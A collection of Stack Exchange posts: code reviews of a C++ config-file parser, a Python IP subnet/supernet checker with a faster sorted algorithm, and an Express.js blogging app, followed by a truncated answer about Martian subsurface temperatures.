/* Erases tabs and spaces between the variable's name and its value. */
std::string & normalize (std::string & str)
{
// Erases leading tabs, leading spaces; trailing tabs, trailing spaces.
trim (str);
// i is the start of the section of tabs and spaces.
// j is the end of said section.
std::size_t i, j;
i = j = 0;
while (i < str.length())
{
if (str[i] == ' ' || str[i] == '\t')
{
j = i + 1;
// find the end of section of tabs and spaces.
while (j < str.length() && (str[j] == ' ' || str[j] == '\t'))
++j;
// if the section consists of just one character,
// then erase just one character.
// otherwise, remove j - i characters.
if (j == i)
str.erase (i, 1);
else
str.erase (i, j - i);
}
else
{
str[i] = std::tolower (str[i]);
++i;
}
}
return str;
}
/* Check if a line consists only of spaces and tabs */
bool spaceonly (const std::string & line)
{
for (int i = 0, j = line.length(); i < j; ++i)
{
if (line[i] != ' ' && line[i] != '\t')
return false;
}
return true;
}
/* Check if a line is valid */
bool isvalid (std::string & line)
{
normalize (line);
std::size_t i = 0;
// if the line is a section
if (line[i] == '[')
{
// find where the section's name ends
std::size_t j = line.find_last_of (']');
// if the ']' character wasn't found, then the line is invalid.
if (j == std::string::npos)
return false;
// if the distance between '[' and ']' is equal to one,
// then there are no characters between section brackets -> invalid line.
if (j - i == 1)
return false;
}
/* Check if a line is a comment */
else if (line[i] == ';' || line[i] == '#' || (line[i] == '/' && line[i + 1] == '/'))
return false;
/* Check if a line is ill-formed */
else if (line[i] == '=' || line[i] == ']')
return false;
else
{
std::size_t j = line.find_last_of ('=');
if (j == std::string::npos)
return false;
if (j + 1 >= line.length())
return false;
}
return true;
}
// parse the line and write the content to our vector
void parse (std::vector<ConfigReader::record> & records, std::string & section, std::string & line)
{
std::size_t i = 0;
// if the line is a section
if (line[i] == '[')
{
++i;
std::size_t j = line.find_last_of (']') - 1;
section = line.substr (i, j);
}
// if the line is a variable + value
else
{
ConfigReader::record temp;
temp.section = section;
// construct the name of the variable
std::size_t j = line.find ('=');
std::string name = line.substr (i, j);
temp.name = name;
// construct the variable's value
std::size_t k = line.find ('=') + 1;
std::size_t z = line.find (';');
z = (z == std::string::npos) ? line.length() : z;
std::string value = line.substr (k, z); // bug ? if the line is width = 32; then the semicolon is not erased.
temp.value = value;
records.push_back (temp);
}
}
}
bool ConfigReader::readfile (const std::string & file)
{
records.clear();
std::ifstream config (file);
if (!config.is_open())
return false;
std::string section;
std::string buffer;
std::size_t i = 0;
while (std::getline (config, buffer, '\n'))
{
if (!spaceonly (buffer))
{
if (isvalid (buffer))
parse (records, section, buffer);
else{}
// std::cout << "Failed at line " << i;
}
++i;
}
return true;
}
std::string ConfigReader::get_string (const std::string & tsection,
const std::string & tname, std::string tdefault)
{
for (std::size_t i = 0; i < records.size(); ++i)
{
if (records[i].section == tsection && records[i].name == tname)
{
return records[i].value;
}
}
record temp;
temp.section = tsection;
temp.name = tname;
temp.value = tdefault;
records.push_back (temp);
return tdefault;
}
ConfigReader::ConfigReader (const std::string & file) : records()
{
readfile (file);
}
ConfigReader::ConfigReader() : records()
{
}
The syntax of the config file is simple:
[video]
width = 1920;
etc;
What should I change? Improve? Are there any errors? (Well, there is one in parse.)
Answer: Use standard algorithms where applicable. For instance, trim could be rewritten:
std::string& trim(std::string& s) {
    auto is_whitespace = [] (char c) -> bool { return c == ' ' || c == '\t'; };
    auto first_non_whitespace = std::find_if_not(begin(s), end(s), is_whitespace);
    s.erase(begin(s), first_non_whitespace);
    auto last_non_whitespace = std::find_if_not(s.rbegin(), s.rend(), is_whitespace)
                                   .base();
    // .base() already points one past the last non-whitespace character,
    // so erase from there (not from std::next of it) to the end.
    s.erase(last_non_whitespace, end(s));
    return s;
}
Likewise, normalize could be written like this:
std::string& normalize(std::string& s) {
    s.erase(std::remove_if(begin(s), end(s),
                           [] (char c) { return c == ' ' || c == '\t'; }),
            end(s));
    std::transform(begin(s), end(s), begin(s),
                   [] (char c) { return std::tolower(c); });
    return s;
}
Note that the intent of this code is quite clear -- I didn't need to add comments to let you know what each section of the code was meant to be doing (although it is necessary to know standard C++ algorithms and idioms like erase-remove). It took me a few minutes of careful reading to realize that you were removing all whitespace in your normalize function; my version makes this very clear. Are you sure you want to remove all whitespace? Couldn't some future configuration use string types?
PS I chose to use C++11 features like auto and lambda, but this code can be written in C++03 with not very much more boilerplate code.
In isvalid, you declare std::size_t i = 0. This is confusing for a couple of reasons. When I see a variable declared non-const, I expect that it will change. Even if it were const, i is not meaningful here. Use 0 instead of i throughout that function to make it more readable. Likewise, your use of j is not self-documenting. I expect i and j to be loop variables. For j it's a bit more forgivable because it has such a narrow scope, but last_bracket is a name that tells me what the variable is actually for.
Also, throughout isvalid, you dereference line[0] and line[1], but line might be empty after normalization. Even if you think that's not the case because of spaceonly guarding it, you should add an assertion that documents the precondition. As it stands, your code will access out-of-bounds memory when the line contains only whitespace and a single '/'.
get_string has funny semantics. For one thing, if my config file is
[Video]
Foo = Bar
I will get an empty string when calling get_string("Video", "Foo") because you normalize the configuration file but not the queries.
Why do you store a default value if the query fails to find a record? This is not behavior I would expect; in fact, I'd expect get_string to be declared const. If you insist on storing a temp value, you should add a constructor for record and rewrite the storage as records.push_back(record(tsection, tname, tdefault)); in modern compilers, this will result in no copy being made while your version requires a copy.
You should also consider a different data structure. There are a few reasonable options.
Keep using a vector, but sort it and use lower_bound to do lookups.
Use a map keyed on section or section and name.
Use an unordered_map.
It depends on future class features, the expected size of config files, and the frequency of insertions, but the vector approach is almost certainly best -- see this blog entry for example.
This list is not exhaustive, but it should get you started. | {
"domain": "codereview.stackexchange",
"id": 4099,
"tags": "c++, parsing"
} |
Check if IP address list has subnet or is supernet | Question: I need to iterate over a list of IP addresses, to check if the elements inside are subnets/supernets between them, for this I use the IP-address library.
Currently I have the following problem: my second iterator (which I use to iterate over the rest of the list) always starts at 0 and therefore compares each element of the list twice (which I think can be avoided).
Here is part of the txt file from which I create the list:
Name
10.104.181.0/23
10.104.180.0/24
10.132.83.112/32
10.104.183.0/24
10.104.185.0/24
10.104.185.32/24
174.28.164.30/24
178.38.233.0/24
10.104.186.0/24
10.132.208.0/24
10.104.185.42/24
10.130.217.88/32
10.104.24.108/24
10.134.213.84/32
10.134.205.18/32
10.104.182.145/32
10.123.232.95/32
10.130.236.0/24
10.105.26.245/32
10.134.65.250/32
10.134.222.120/32
10.104.184.62/32
10.104.184.61/32
10.105.121.0/24
And here is my python code:
import ipaddress
import sys

lines = []
fileobj=open("test.txt")
for line in fileobj:
    lines.append(line.strip())#create the list from the txt file
lines.pop(0)#remove line "name"
for line in lines:
    for j in range(1,len(lines)):
        if(line==lines[j]):#problem here: j start always at 1
            print('comparing same line.... skipping')
            pass
        elif(ipaddress.ip_network(line,False).subnet_of(ipaddress.ip_network(lines[j],False))):#check if subnet
            print(line+' is subnet of network'+lines[j])
        elif(ipaddress.ip_network(line,False).supernet_of(ipaddress.ip_network(lines[j],False))):#check if supernet
            print(line+' is super of network'+lines[j])
What I'm looking for:
How to solve the problem of my second iterator.
Any other improvement (whatever it is, formatting, algorithm,...) is appreciated.
Answer: This section:
fileobj=open("test.txt")
for line in fileobj:
lines.append(line.strip())#create the list from the txt file
lines.pop(0)#remove line "name"
has an alternate representation as an iterator-adjustment to skip one line:
with open('test.txt') as fileobj:
    next(fileobj)
    lines = [line.strip() for line in fileobj]
Also note use of a list comprehension and a context manager.
Your separate supernet/subnet checks are redundant. If A is a subnet of B, B is a supernet of A; so it's not even worth doing the second.
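Both the duplicate comparisons and the redundant supernet branch can be removed at once with itertools.combinations, which yields each unordered pair exactly once; nothing is compared with itself, and no pair is visited twice. A sketch using a few of the sample addresses:

```python
from ipaddress import ip_network
from itertools import combinations

lines = ['10.104.181.0/23', '10.104.180.0/24', '10.132.83.112/32']
nets = [(s, ip_network(s, strict=False)) for s in lines]

matches = []
# combinations() yields each unordered pair exactly once, so no pair is
# compared twice and nothing is compared with itself.
for (a_str, a), (b_str, b) in combinations(nets, 2):
    if a.subnet_of(b):
        matches.append((a_str, b_str))
    elif b.subnet_of(a):
        matches.append((b_str, a_str))

for sub, sup in matches:
    print(sub + ' is subnet of network ' + sup)
```

For this sample it reports that 10.104.180.0/24 is a subnet of 10.104.181.0/23 (which strict=False masks down to 10.104.180.0/23).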
Algorithmically: if your list is very, very long you may want to consider moving away from your current nested loop. Your current loop is O(n^2) in time and I don't immediately see a way to avoid this. Consider doing something like - roughly -
Populate a list of tuples of start and end IP address integers and IP objects; the packed integer representation can be obtained by casting an ipaddress object to int
Sort this list; a naive .sort() should work
On your outer loop, iterate over all entries for subnet selection
Prune away any potential supernets whose end is so low that they will never match again
On your inner loop, iterate from the beginning of the list up to the current entry and then quit.
This sortation and early-bail should improve your performance a little.
Example
Edit: "a little" seems to be a (vast) understatement; comparing the two:
from collections import OrderedDict
from functools import partial
from ipaddress import IPv4Network
from random import randrange, randbytes, seed
from timeit import timeit
from typing import Iterable, Tuple, Sequence

NetRow = Tuple[int, int, str]
IndexRow = Tuple[int, int]


def parse_addresses(filename: str) -> Iterable[NetRow]:
    with open(filename) as f:
        next(f)
        for line in f:
            net_str = line.strip()
            net = IPv4Network(net_str, strict=False)
            yield int(net.network_address), int(net.broadcast_address), net_str


def end_indices(nets: Sequence[NetRow]) -> Iterable[IndexRow]:
    for i, (start, end, net) in enumerate(nets):
        yield end, i


def new(filename: str):
    # Start and end integers and network objects ordered by start
    subnets = sorted(parse_addresses(filename))
    # Supernet dictionary by index from subnets; in same order as subnets
    supernets = OrderedDict(enumerate(subnets))
    # List of tuples of subnet end to subnet index, used for pruning
    ends = sorted(end_indices(subnets))

    for sub_start, sub_end, subnet in subnets:
        # If there are any supernets whose end occurs before the current start,
        # they need to be pruned because they will never match
        for n_to_drop, (end, index) in enumerate(ends):
            if end >= sub_start:
                break
            supernets.pop(index)
        del ends[:n_to_drop]

        for super_start, super_end, supernet in supernets.values():
            # Skip comparison to self
            if subnet is supernet:
                continue
            # If the current supernet start is after the current subnet start,
            # there will not be any more supernets that encompass this subnet
            if super_start > sub_start:
                break
            # The supernet start occurs at or before the current subnet start.
            # If the supernet end occurs at or after the current subnet end,
            # then the supernet encompasses the subnet.
            if super_end >= sub_end:
                # assert subnet.subnet_of(supernet)
                print(f'{subnet} is subnet of {supernet}')


def old(filename: str):
    lines = []
    fileobj = open(filename)
    for line in fileobj:
        lines.append(line.strip())  # create the list from the txt file
    lines.pop(0)  # remove line "name"
    for line in lines:
        for j in range(1, len(lines)):
            if (line == lines[j]):  # problem here: j start always at 1
                # print('comparing same line.... skipping')
                pass
            elif (IPv4Network(line, False).subnet_of(
                    IPv4Network(lines[j], False))):  # check if subnet
                print(line
                      + ' is subnet of network ' + lines[j])
            # elif (IPv4Network(line, False).supernet_of(
            #         IPv4Network(lines[j], False))):  # check if supernet
            #     print(line
            #           + ' is super of network ' + lines[j])


def generate_test(filename: str, min_mask: int, rows: int):
    seed(0)  # for repeatability
    with open(filename, 'w') as f:
        f.write('Name\n')
        for _ in range(rows):
            addr = '.'.join(str(b) for b in randbytes(4))
            mask = randrange(min_mask, 31)
            f.write(f'{addr}/{mask}\n')


if __name__ == '__main__':
    generate_test('bigtest.txt', min_mask=14, rows=1_000)
    for method, title in (
        (new, 'New'),
        (old, 'Old'),
    ):
        print(f'{title} method:')
        t = timeit(partial(method, 'bigtest.txt'), number=1)
        print(f'{t:.3f}s\n')
Output
New method:
50.100.190.198/30 is subnet of 50.100.216.175/16
68.143.197.241/26 is subnet of 68.142.21.93/15
87.88.133.166/17 is subnet of 87.88.222.120/17
87.88.222.120/17 is subnet of 87.88.133.166/17
101.186.112.235/19 is subnet of 101.186.155.104/14
106.183.253.213/22 is subnet of 106.180.121.90/14
110.142.177.23/29 is subnet of 110.140.246.97/14
110.206.109.247/20 is subnet of 110.205.222.149/14
125.43.157.205/28 is subnet of 125.42.59.132/15
138.157.204.243/29 is subnet of 138.157.172.230/14
158.221.173.230/30 is subnet of 158.221.69.71/14
239.186.245.174/18 is subnet of 239.185.216.72/14
243.3.157.156/28 is subnet of 243.3.56.96/16
0.029s
Old method:
87.88.222.120/17 is subnet of network 87.88.133.166/17
125.43.157.205/28 is subnet of network 125.42.59.132/15
106.183.253.213/22 is subnet of network 106.180.121.90/14
101.186.112.235/19 is subnet of network 101.186.155.104/14
158.221.173.230/30 is subnet of network 158.221.69.71/14
243.3.157.156/28 is subnet of network 243.3.56.96/16
87.88.133.166/17 is subnet of network 87.88.222.120/17
50.100.190.198/30 is subnet of network 50.100.216.175/16
110.206.109.247/20 is subnet of network 110.205.222.149/14
138.157.204.243/29 is subnet of network 138.157.172.230/14
110.142.177.23/29 is subnet of network 110.140.246.97/14
68.143.197.241/26 is subnet of network 68.142.21.93/15
239.186.245.174/18 is subnet of network 239.185.216.72/14
33.487s
A more "fair" comparison uses your own algorithm but with a pre-parse step:
def old(filename: str):
    lines = []
    with open(filename) as fileobj:
        next(fileobj)
        for line in fileobj:
            net_str = line.strip()
            lines.append((net_str, IPv4Network(net_str, False)))
    for subnet_str, subnet in lines:
        for supernet_str, supernet in lines:
            if subnet_str is supernet_str:
                continue
            if subnet.subnet_of(supernet):
                print(f'{subnet_str} is subnet of {supernet_str}')
This still took 1.87s on my machine, which is ~58x the time of the 32ms of the new method.
Comparing the new and fair-old methods for min_mask=20, rows=10_000 is more dramatic: 0.362s vs. 249.763s, ~690x faster. | {
"domain": "codereview.stackexchange",
"id": 41334,
"tags": "python-3.x, ip-address"
} |
Finding Interatomic Spacing | Question: Here is the problem I am working on
For what temperatures are the atoms in an ideal gas at pressure $P$ quantum mechanical? Hint: use the ideal gas law $PV = NkT$ to deduce the interatomic spacing (the answer is $T < (1/k)(h^2/3m)^{3/5} P^{2/5}$). Obviously we want $m$ to be as small as possible and $P$ as large as possible for the gas to show quantum behavior. Put in numbers for helium at atmospheric pressure. Is hydrogen in outer space (interatomic distance ≈ 1 cm and temperature ≈ 3 K) quantum mechanical?
According to the answer key, to find the interatomic spacing, we need to find the size of a single gas particle. One gas particle corresponds to $N = 1$, and the volume is $V = d^3$. This leads to
$d = \left( \frac{kT}{P} \right)^{1/3}$
I have two objections to this, for which I hope you can provide correction. Firstly, doesn't assigning the volume $V = d^3$ imply that we are assuming the atoms are cube-shaped? Secondly, how does finding the size of a single gas particle provide us with the interatomic spacing? It would seem that the most we could deduce from such information is the closest two gas particles could get. Are we to assume that the gas particles are this closely packed? Wouldn't the gas solidify at this point?
Answer: The idea of the question is to find the temperature at which the average interparticle spacing is equal to the average de Broglie wavelength. Both of these are averages because the atoms of the ideal gas are not evenly spaced and the velocity (and therefore de Broglie wavelength) of the ideal gas atoms follows the Maxwell-Boltzmann distribution. So this is going to be a very rough calculation.
Given how rough the calculation is, the approximation that the gas atoms are on average equally spaced seems a reasonable one. In that case our $N$ atoms are distributed in a volume $V$, so the average spacing $d$ is:
$$\begin{align}
d &= \left( \frac{V}{N} \right)^{1/3} \\
&= \left( \frac{\frac{NkT}{P}}{N} \right)^{1/3} \\
&= \left( \frac{kT}{P} \right)^{1/3}
\end{align}$$ | {
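Plugging numbers into the resulting bound (a quick back-of-the-envelope script; SI constants rounded to four figures) gives the helium estimate the question asks for:

```python
# Quantum behaviour sets in roughly when the interatomic spacing
# d = (kT/P)^(1/3) matches the de Broglie wavelength h / sqrt(3 m k T),
# i.e. for T below (1/k) * (h^2 / (3 m))^(3/5) * P^(2/5).
h = 6.626e-34          # Planck constant, J s
k = 1.381e-23          # Boltzmann constant, J / K
m_helium = 6.646e-27   # mass of a helium-4 atom, kg
P = 1.013e5            # atmospheric pressure, Pa

T_threshold = (1 / k) * (h**2 / (3 * m_helium))**(3 / 5) * P**(2 / 5)
print(f'T < {T_threshold:.1f} K')  # about 3 K for helium at 1 atm
```

So helium at atmospheric pressure only becomes quantum mechanical at a few kelvin, which is why this regime is so hard to reach for ordinary gases.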
"domain": "physics.stackexchange",
"id": 15240,
"tags": "quantum-mechanics, homework-and-exercises, ideal-gas"
} |
Is a Rubbia thorium reactor safer than other modern reactor types? | Question: I keep wondering how a Rubbia thorium reactor would handle a natural disaster of Fukushima level intensity. As I understand it the nuclear chain reaction would stop instantly if the power is cut, but nasty waste products such as Uranium-233 would still require substantial cooling and hence it would seem that this reactor is just as unsafe as any other type of reactor with definite risk of meltdown, radiation and other problems?
Answer:
As I understand it the nuclear chain reaction would stop instantly if the power is cut, but nasty waste products such as Uranium-233 would still require substantial cooling
You are focusing on entirely the wrong thing.
A reactor burning Thorium produces fission products (like all reactors), including the majority of the heat source as well as radioactive Iodine and Cesium isotopes. The problem with Fukushima was mostly the release of such isotopes into the atmosphere (ultimately, isn't all of nuclear safety concerned with this?). However much heat U-233 produces is completely beside the point when you ask to compare it to Fukushima; it matters, just not for this question.
I keep wondering how a Rubbia thorium reactor would handle a natural disaster of Fukushima level intensity.
The key design feature of the Rubbia proposed reactor is that it is a subcritical accelerator driven reactor. To the extent that it uses a solid fuel form that does not have active fission product removal it is subject to the aforementioned problems.
The problems of sustained removal of decay heat in even the most dire of circumstances, however, have been addressed very well just with the next generation of reactors we are building today (although the concern can never be completely eliminated). The "passive" designs share the same fuel type with Fukushima (and almost all other reactors in the world), and just use natural forces to cool the reactor for weeks to months after an accident so loss of power isn't a concern. These same passive design principles could (and would) be applied to the Rubbia reactor design, because the Rubbia idea addresses concerns very different from the problems at Fukushima, which include sustainability and criticality safety.
The reduced radioactivity of accelerator driven subcritical reactors and Thorium reactors is not the short-lived stuff that creates problems during accidents. Mostly they reduce the long term waste and the unused fuel. | {
"domain": "physics.stackexchange",
"id": 10165,
"tags": "nuclear-engineering"
} |
Introduction to IP : Laplacian of Gaussian? | Question: I am very new to the concept of computer vision (and image processing), and trying to understand the algorithm used for edge detection.
One thing I'm currently struggling to figure out is the Laplacian of Gaussian
In this case, how do you determine the values of $x$ and $y$? I thought the centre of the kernel was the origin $((x,y) = (0,0))$, but it doesn't seem like the right number.
Also, if there are any resources that you would recommend to go through, I would really appreciate them.
Answer: You are right about the $x$ and $y$ values. The center of the matrix is $(0,0)$ and the corner points are $(\pm 4,\pm 4)$. But they obviously wanted integer values in the matrix, so they simply scaled the LoG function by a factor of $482.75$ (just to get a decent range). Evaluating the function with this scale factor gives you (for the lower right quarter of the total matrix):
LoG =
-40.000000 -23.086993 0.294243 5.218347 2.080704
-23.086993 -11.762411 3.077873 4.839310 1.745668
0.294243 3.077873 5.409023 3.361998 0.998325
5.218347 4.839310 3.361998 1.456020 0.365518
2.080704 1.745668 0.998325 0.365518 0.081641
Rounding should give you the final result. However, if you look closely, you'll see that it doesn't (at least not for all $(x,y)$ values). If you check the matrix on this page, you'll see that for the same $\sigma$ it is also different. So people make mistakes and they just copy from each other. | {
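For reference, the quoted quarter-matrix can be reproduced numerically. The source doesn't state $\sigma$, but $\sigma \approx 1.4$ together with the $482.75$ scale factor recovers the values above (a sketch; $\sigma = 1.4$ is my inference, not given in the original):

```python
import numpy as np

def log_kernel_value(x, y, sigma):
    """Laplacian of Gaussian: -1/(pi s^4) (1 - r^2/(2 s^2)) exp(-r^2/(2 s^2))."""
    r2 = x**2 + y**2
    s2 = sigma**2
    return -1.0 / (np.pi * s2**2) * (1.0 - r2 / (2.0 * s2)) * np.exp(-r2 / (2.0 * s2))

sigma = 1.4      # assumed value; reproduces the quoted matrix
scale = 482.75   # the scale factor mentioned above

xy = np.arange(5)                # lower-right quarter: (0, 0) .. (4, 4)
xx, yy = np.meshgrid(xy, xy)
quarter = scale * log_kernel_value(xx, yy, sigma)

print(round(quarter[0, 0], 2))   # centre value, about -40.0
print(round(quarter[4, 4], 4))   # corner value, about 0.0816
```

Rounding each entry of `quarter` to the nearest integer is exactly the "rounding should give you the final result" step described above.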
"domain": "dsp.stackexchange",
"id": 2364,
"tags": "image-processing, gaussian"
} |
Express.js blogging application | Question: I have put together a blogging application with Express, EJS and MongoDB.
There is a public, front-end part and a dashboard. In index.js I have:
// Bring the Dashboard
const dashboardRoute = require("./routes/admin/dashboard");
// Register Dashboard Routes
app.use('/dashboard', dashboardRoute);
// Bring the Posts Routes
const postsRoute = require('./routes/front-end/posts');
// Register Posts Routes
app.use('/', postsRoute);
In routes\admin\dashboard.js I have:
const express = require('express');
const imageUploader = require('../../utils/imageupload.js');
const validator = require('../../utils/validation.js');
const dashboardController = require('../../controllers/admin/dashboard');
const categoriesController = require('../../controllers/admin/categories');
// Express router
const router = express.Router();
// Display Dashboard
router.get('/', dashboardController.displayDashboard);
// Render add Post Form
router.get('/addpost', dashboardController.addPostForm);
// Add Post
router.post('/post/add', imageUploader.upload, validator.addPostCheck, dashboardController.addPost);
// Edit Post
router.get('/post/edit/:id', dashboardController.editPost);
// Update Post
router.post('/post/update/:id', imageUploader.upload, validator.addPostCheck, dashboardController.updatePost);
// Delete Post
router.delete('/post/delete/:id', dashboardController.deletePost);
// Display Categories
router.get('/categories', categoriesController.showCategories);
// Render add Categories Form
router.get('/categories/addcategory', categoriesController.addCategoryForm);
// Add Category
router.post('/category/add', validator.addCategoryCheck, categoriesController.addCategory);
// Edit Post
router.get('/category/edit/:id', categoriesController.editCategory);
// Update Category
router.post('/category/update/:id', validator.addCategoryCheck, categoriesController.updateCategory);
// Delete Category
router.delete('/category/delete/:id', categoriesController.deleteCategory);
module.exports = router;
I am concerned especially about the controllers "under" the dashboard (controllers\admin\dashboard.js):
const Post = require('../../models/post');
const Category = require('../../models/categories');
const {upload} = require('multer');
const {validationResult} = require('express-validator');
exports.displayDashboard = async (req, res, next) => {
const posts = await Post.find({}, (err, posts) => {
if (err) {
console.log('Error: ', err);
} else {
res.render('admin/index', {
layout: 'admin/layout',
website_name: 'MEAN Blog',
page_heading: 'Dashboard',
posts: posts
});
}
}).populate('category');
};
exports.addPostForm = async (req, res, next) => {
const categories = await Category.find({}, (err, categories) => {
if (err) {
console.log('Error: ', err);
} else {
res.render('admin/addpost', {
layout: 'admin/layout',
website_name: 'MEAN Blog',
page_heading: 'Dashboard',
page_subheading: 'Add New Post',
categories: categories
});
}
});
}
exports.addPost = (req, res, next) => {
const form = {
titleholder: req.body.title,
excerptholder: req.body.excerpt,
bodyholder: req.body.body
};
const errors = validationResult(req);
const post = new Post();
post.title = req.body.title;
post.short_description = req.body.excerpt
post.full_text = req.body.body;
post.category = req.body.category;
if (req.file) {
post.post_image = req.file.filename;
}
if (!errors.isEmpty()) {
const categories = Category.find({}, (err, categories) => {
req.flash('danger', errors.array())
res.render('admin/addpost', {
layout: 'admin/layout',
website_name: 'MEAN Blog',
page_heading: 'Dashboard',
page_subheading: 'Add New Post',
categories: categories,
form: form
});
});
} else {
post.save(function(err) {
if (err) {
console.log(err);
return;
} else {
req.flash('success', "The post was successfully added");
req.session.save(() => res.redirect('/dashboard'));
}
});
}
}
exports.editPost = async (req, res, next) => {
const postId = req.params.id;
Post.findById(postId, function(err, post) {
const categories = Category.find({}, (err, categories) => {
if (err) {
console.log('Error: ', err);
} else {
res.render('admin/editpost', {
layout: 'admin/layout',
website_name: 'MEAN Blog',
page_heading: 'Dashboard',
page_subheading: 'Edit Post',
categories: categories,
post: post
});
}
});
});
}
exports.updatePost = (req, res, next) => {
const query = {
_id: req.params.id
}
const form = {
titleholder: req.body.title,
excerptholder: req.body.excerpt,
bodyholder: req.body.body
};
const errors = validationResult(req);
const post = {};
post._id = req.params.id;
post.title = req.body.title;
post.short_description = req.body.excerpt
post.full_text = req.body.body;
post.category = req.body.category;
if (req.file) {
post.post_image = req.file.filename;
}
if (!errors.isEmpty()) {
req.flash('danger', errors.array());
const categories = Category.find({}, (err, categories) => {
res.render('admin/editpost', {
layout: 'admin/layout',
website_name: 'MEAN Blog',
page_heading: 'Dashboard',
page_subheading: 'Edit Post',
categories: categories,
form: form,
post: post
});
});
} else {
Post.update(query, post, function(err) {
if (err) {
console.log(err);
return;
} else {
req.flash('success', "The post was successfully updated");
req.session.save(() => res.redirect('/dashboard'));
}
});
}
}
exports.deletePost = (req, res, next) => {
const postId = req.params.id;
Post.findByIdAndRemove(postId, function(err) {
if (err) {
console.log('Error: ', err);
}
res.sendStatus(200);
});
}
The controller concerning the categories:
const Category = require('../../models/categories');
const { validationResult } = require('express-validator');
exports.showCategories = async (req, res, next) => {
const categories = await Category.find({}, (err, categories) => {
if(err){
console.log('Error: ', err);
} else {
res.render('admin/categories', {
layout: 'admin/layout',
website_name: 'MEAN Blog',
page_heading: 'Dashboard',
page_subheading: 'Categories',
categories: categories
});
}
});
};
exports.addCategoryForm = (req, res, next) => {
res.render('admin/addcategory', {
layout: 'admin/layout',
website_name: 'MEAN Blog',
page_heading: 'Dashboard',
page_subheading: 'Add New Category',
});
}
exports.addCategory = (req, res, next) => {
var form = {
categoryholder: req.body.cat_name
};
const errors = validationResult(req);
const category = new Category();
category.cat_name = req.body.cat_name;
if (!errors.isEmpty()) {
req.flash('danger', errors.array())
res.render('admin/addcategory',{
layout: 'admin/layout',
website_name: 'MEAN Blog',
page_heading: 'Dashboard',
page_subheading: 'Add New Category',
form:form
}
);
} else {
category.save(function(err) {
if (err) {
console.log(err);
return;
} else {
req.flash('success', "The category was successfully added");
req.session.save(() => res.redirect('/dashboard/categories'));
}
});
}
}
exports.editCategory = (req, res, next) => {
const catId = req.params.id;
Category.findById(catId, function(err, category){
if (err) {
console.log('Error: ', err);
} else {
res.render('admin/editcategory', {
layout: 'admin/layout',
website_name: 'MEAN Blog',
page_heading: 'Dashboard',
page_subheading: 'Edit Category',
category: category
});
}
});
}
exports.updateCategory = (req, res, next) => {
const query = {_id:req.params.id}
var form = {
categoryholder: req.body.cat_name
};
const errors = validationResult(req);
const category = {};
category._id = req.params.id;
category.cat_name = req.body.cat_name;
if (!errors.isEmpty()) {
req.flash('danger', errors.array())
res.render('admin/editcategory',{
layout: 'admin/layout',
website_name: 'MEAN Blog',
page_heading: 'Dashboard',
page_subheading: 'Edit Category',
form: form,
category: category
}
);
} else {
Category.update(query, category, function(err){
if(err){
console.log(err);
return;
} else {
req.flash('success', "The category was successfully updated");
req.session.save(() => res.redirect('/dashboard/categories'));
}
});
}
}
exports.deleteCategory = (req, res, next) => {
const catId = req.params.id;
Category.findByIdAndRemove(catId, function(err){
if (err) {
console.log('Error: ', err);
}
res.sendStatus(200);
});
}
Answer: Shorthand Property Definition Notation
As I mentioned in an answer to one of your previous posts, the shorthand property definition notation can be used to simplify lines like these, where the key is the same as the name of the variable being referenced:
categories: categories,
posts: posts
to simply:
categories,
posts
Waiting with await
With async / await the code that is typically in the promise callback can be moved out- so take this section for example:
const posts = await Post.find({}, (err, posts) => {
    if (err) {
        console.log('Error: ', err);
    } else {
        res.render('admin/index', {
            layout: 'admin/layout',
            website_name: 'MEAN Blog',
            page_heading: 'Dashboard',
            posts: posts
        });
    }
}).populate('category');
I haven’t tested this code but my presumption is that the call to .populate('category') comes after the callback where res.render() is called - so that may be a bug.
It can be simplified to something like this:
const posts = await Post.find({}).populate('category').catch(err => {
    console.log('Error: ', err);
});

res.render('admin/index', {
    layout: 'admin/layout',
    website_name: 'MEAN Blog',
    page_heading: 'Dashboard',
    posts
});
Though maybe the call to populate the category needs to come after the value from Post.find({}) is assigned to posts.
And similarly for the other functions called with await. This way the value assigned to posts can be used properly.
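As a self-contained illustration of that await-plus-catch pattern (using a stub in place of the real Mongoose query, so the function names and data shapes here are hypothetical):

```javascript
// Stub standing in for Post.find().populate(); a real Mongoose query
// returns a thenable that works with await the same way.
async function findPosts() {
    return [{ title: 'Hello', category: { cat_name: 'news' } }];
}

async function displayDashboard() {
    // .catch() supplies a fallback, so `posts` is always an array and the
    // render data below can be built outside any callback.
    const posts = await findPosts().catch(err => {
        console.log('Error: ', err);
        return [];
    });
    return {
        layout: 'admin/layout',
        page_heading: 'Dashboard',
        posts
    };
}

displayDashboard().then(ctx => console.log(ctx.posts.length)); // logs 1
```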
Useless else keyword after return
In the callback to post.save():
if (err) {
console.log(err);
return;
} else {
req.flash('success', "The post was successfully added");
req.session.save(() => res.redirect('/dashboard'));
}
The code in the else block can be moved out because in the first case there is a return statement. This can reduce the indentation level.
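As a hedged sketch of that flattening (the callback body here is an illustrative stand-in, not the app's actual save handler), the early-return shape looks like this:

```javascript
// Sketch of the early-return pattern: with `return` in the error branch,
// the success path needs no `else` and loses one indentation level.
// `handleSave` and its arguments are illustrative stand-ins, not the
// app's actual save callback.
function handleSave(err, onSuccess) {
  if (err) {
    console.log(err.message);
    return 'logged-error';
  }
  // Only reached when err is falsy - no `else` needed.
  return onSuccess();
}

console.log(handleSave(null, () => 'saved'));
console.log(handleSave(new Error('boom'), () => 'saved'));
```

The behavior is identical to the nested if/else version; only the nesting changes.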
Variable declared with var
The answer by CertainPerformance to your previous post recommends avoiding the var keyword. Yet this code uses it:
exports.addCategory = (req, res, next) => {
var form = {
categoryholder: req.body.cat_name
};
That variable is never reassigned so it can be declared with const.
And similarly for updateCategory() - it has a variable declared with var named form that never gets re-assigned. | {
"domain": "codereview.stackexchange",
"id": 39800,
"tags": "javascript, mongodb, express.js, modules, ecmascript-8"
} |
How deep in Mars would a person not need insulation and pressure? | Question: How deep below Mars' surface would one have to go to both not need a pressurized suit and be warm enough to just wear clothes? In other words, is there a Goldilocks depth where you would only need an oxygen supply?
Answer: According to this paper, there are various reasonably good estimates of the temperature gradient of the Martian soil. Note that the first direct measurements will come with the next Martian lander, InSight:
Image from here
The part of this estimation that is important for us is this:
Depth penetration of the annual temperature wave at $120^\circ E,
20^\circ N$, using data from the NASA/MSFC Mars GRAM as the surface
boundary condition and assuming a planetary heat flow of 20
$\frac{mW}{m^2}$. The snapshots of the temperature as a function of
depth are given for the models with
(a) $k_\infty = 0.02 \frac{W}{m\cdot K}$ and
(b) $k_\infty = 0.1 \frac{W}{m\cdot K}$.
Heat flows derived from the soil temperatures given in Figures 3a and
3b for models with
